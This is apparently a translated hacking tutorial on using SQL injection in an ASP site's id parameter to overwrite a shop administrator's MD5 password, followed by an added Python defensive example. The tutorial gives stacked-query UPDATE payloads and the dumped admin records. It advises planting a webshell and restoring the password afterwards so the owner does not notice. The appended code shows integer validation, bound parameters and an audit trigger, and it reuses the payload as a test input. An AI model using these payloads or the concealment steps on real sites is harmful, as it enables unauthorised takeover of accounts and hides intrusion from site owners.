Practical technique: changing the system administrator password through injection

  
An injection point has been found: xxx.com/book.asp?id=1996. I have just scanned it with NB. As you can see, there is a table named shop_admin. However, the password is MD5 encrypted:

[adminid]: 24
[admin]: zhuyaod
[password]: d4716077c2ba075c

Let's try deception. As you can see, deception does not work. What now? Crack the password? How much time and memory would that waste? Let me introduce a new method: injection. The injection statement is as follows:

    ;update shop_admin set password='new MD5 encryption password' where password='d4716077c2ba075c'--

For example, to change the zhuyaod password to wmmhacker, we must first obtain the twelve-digit password for wmmhacker after MD5 encryption. It can be converted with the tool of Ming Xiaozi.

    wmmhacker - f8dc763194f29433

    ;update shop_admin set password='f8dc763194f29433' where password='d4716077c2ba075c'--

Let's test. The page did not return an error, indicating success. Now let's re-guess the password under the shop_admin table.

[adminid]: 24
[admin]: zhuyaod
[password]: f8dc763194f29433

Comparing the two, it has changed. Now we can log in. Come in. Ha ha. Here we are. It is worth mentioning that after entering the admin back end, we then try to get a WEBSHELL. After that, don't forget to restore the administrator password. Otherwise he will find out!

    ;update shop_admin set password='d4716077c2ba075c' where password='f8dc763194f29433'--
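Seen from the defending side, the request above works only because the id value reaches the SQL text unvalidated, and the restore step goes unnoticed only because nothing records writes to shop_admin. The following is an added example, not code from the original page or the site: SQLite stands in for the site's database, and the book table, the admin_audit table, the trigger and the function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed schema and rows; shop_admin columns follow the names shown on the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE book (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE shop_admin (adminid INTEGER PRIMARY KEY, admin TEXT, password TEXT);
        CREATE TABLE admin_audit (adminid INTEGER, old_pw TEXT, new_pw TEXT,
                                  changed_at TEXT DEFAULT CURRENT_TIMESTAMP);
        -- Record every password write: a change followed by a restore leaves two rows.
        CREATE TRIGGER shop_admin_pw_audit AFTER UPDATE OF password ON shop_admin
        BEGIN
            INSERT INTO admin_audit (adminid, old_pw, new_pw)
            VALUES (OLD.adminid, OLD.password, NEW.password);
        END;
        INSERT INTO book VALUES (1996, 'constructed title');
        INSERT INTO shop_admin VALUES (24, 'zhuyaod', 'd4716077c2ba075c');
    """)
    return db

def get_book(db, raw_id):
    """Hardened lookup for book.asp?id=...: ASCII digits only, then a bound parameter."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return None  # anything other than a plain integer never reaches the database
    row = db.execute("SELECT title FROM book WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None

def admin_password(db):
    """Current stored hash for adminid 24."""
    return db.execute("SELECT password FROM shop_admin WHERE adminid = 24").fetchone()[0]

def audit_rows(db):
    """Audit trail of password writes, oldest first."""
    return db.execute("SELECT old_pw, new_pw FROM admin_audit ORDER BY rowid").fetchall()

if __name__ == "__main__":
    db = make_db()
    # The id value with the statement quoted on the page appended to it.
    payload = ("1996;update shop_admin set password='f8dc763194f29433' "
               "where password='d4716077c2ba075c'--")
    print(get_book(db, "1996"), get_book(db, payload), admin_password(db), audit_rows(db))
```

The audit table should be writable only by the trigger's owner and not by the web application's database account, otherwise the same account that changed the password could also edit the trail.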